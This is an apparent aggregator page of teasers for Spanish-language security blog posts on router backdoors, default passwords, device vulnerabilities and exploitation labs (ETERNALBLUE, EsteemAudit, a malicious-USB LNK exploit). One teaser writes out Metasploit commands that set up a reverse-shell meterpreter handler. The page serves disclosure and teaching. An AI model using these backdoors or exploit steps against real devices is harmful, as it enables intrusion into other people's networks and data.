Passwords en posts its 2 y algoritmos nuevos
Esta tarjeta le vino a un amigo con su módem Thomson TG585v8: Como ya saben Routerpwn tiene el generador para las versiones anteriores de módems Thomson ST585. Lo que probablemente no sepan es que el...
View ArticlePresentaciones de GuadalajaraCON 2012
Durante el 20 y 21 de abril se llevó a cabo el GuadalajaraCON 2012 en Guadalajara, Jalisco, México. Fue un evento gratuito y libre. El día de hoy se terminaron de publicar las presentaciones en PDF y...
View ArticleRobo de cookies por router vulnerable (caso 2Wire)
Desde hace tiempo es conocido que los routers caseros están plagados de vulnerabilidades. En este caso mostramos como una serie de vulnerabilidades en routers 2Wire, al ser explotadas secuencialmente,...
View ArticleRevelación de información en dispositivos Netgear
Modelos: DGND3300v2, WNR2000v2, DGN1000, N300 y otros Firmwares: V2.1.00.48_1.00.48, V1.1.0.41WW, V1.0.0.34_29.0.45NA y otros Fecha: 26/05/2012 Severidad: Baja Impacto: Revelación de versión de...
View ArticleEvasión de autenticación en Huawei HG866
Equipment ID: EchoLife:HG866 Hardware Version: HG866GTA_VER.C, 01, 02 Software Version: V1R2C01SPC202, R3.2.4.92sbn – R3.4.2.257sbn, 3FE53864AOCB16 Severidad: Alta Impacto: Evasión de autenticación...
View ArticleFibra óptica de Telmex VS protección de datos personales
Telmex esta cambiando de DSL a fibra óptica (Gratis!) en varias zonas del Distrito Federal y del País. Lo esta haciendo a través de subcontratistas. Van a tu casa, ponen la fibra, quitan tu módem de...
View ArticlePuerta trasera en fibra óptica Alcatel-Lucent de Infinitum
Me encontraba buscando como generar las contraseñas inalámbricas de los nuevos dispositivos de fibra óptica de Infinitum cuando me topé con una cuenta de administración con un password fijo la cual...
View ArticlePuerta trasera en Technicolor TG582n
Recientemente mi amigo Hans Von que es también aficionado al hackeo de routers me comentó de una cuenta de administración por defecto en los dispositivos Technicolor TG582n (10.2.0.B). Buscando un...
View ArticleEvasión de bloqueo de protector de pantalla con RSS Saver
Como saben es recomendable habilitar el bloqueo automático de las computadoras. Esto se logra poniendo un timeout en el protector de pantalla. Desafortunadamente los protectores de pantalla mal...
View ArticleObtener la dirección IP de un usuario de Skype
Es posible obtener la dirección IP de un usuario de Skype con solamente el nombre de usuario. Si el usuario se encuentrá desconectado es posible obtener la última dirección desde la cual se conectó. La...
View ArticleDescarga el Detector de Puertas Traseras v2.0
En este blog hemos hablado mucho acerca de las puertas traseras que contienen los principales dispositivos de interconexión en México. Hemos desarrollado una herramienta que permite fácilmente detectar...
View ArticleExplotación masiva de vulnerabilidades en ruteadores
Ver disapositivas Los métodos para escanear redes han evolucionado, y podemos encontrar millones de dispositivos de interconexión vulnerables que ponen en riesgo la información de sus propietarios y...
View ArticleScripts de NMap para Belkin Wemo Smart Switch
El Belkin WeMo Switch es un contacto eléctrico que puede ser controlado desde la red local. La versión actual del firmware (WeMo_WW_2.00.10966.PVT-OWRT-SNS) no requiere autenticación para prender o...
View ArticleScripts para obtener información de Trane Trace SC HVAC
Par de scripts para obtener información y explotar vulnerabilidades en Trane Tracer SC, un panel inteligente utilizado para comunicación con controladores de equipo HVAC. http-vuln-cve2016-0870.nse...
View ArticleExplotando EsteemAudit en Windows 2003 x86 con EsteemAudit-2.1.0.exe desde...
La práctica consiste en explotar un Windows 2003 x86 con los exploits filtrados de la NSA desde Metasploit. La práctica incluye la instalación del ejecutable original de EsteemAudit-2.1.0.exe. 1....
View ArticleDetectando y Explotando ETERNALBLUE en Windows 7 x64 con NMAP y Metasploit
Esta práctica consiste en utilizar el exploit ya incluido en Metasploit para comprometer un Windows 7 de 64 bits. 1. Identifica en que rango está la máquina virtual desde Kali: root@kali:~# ifconfig...
View ArticleCreando un USB malicioso con Microsoft Windows LNK Exploit: CVE-2017-8464
1. En Metasploit crea un HANDLER para recibir la conexión: msf 》 use exploit/multi/handler msf exploit(handler) 》 set payload windows/x64/meterpreter/reverse_tcp msf exploit(handler) 》 set LHOST...
View ArticleExplotando ETERNALROMANCE ETERNALSINERGY en Windows Server 2016
El exploit se encuentra en la popular base de datos de exploits: exploit-db. Es necesario agregar una cuenta valida de cualquier nivel de permisos y el nombre de un PIPE. 1. Abrir firefox en la...
View Article
More Pages to Explore .....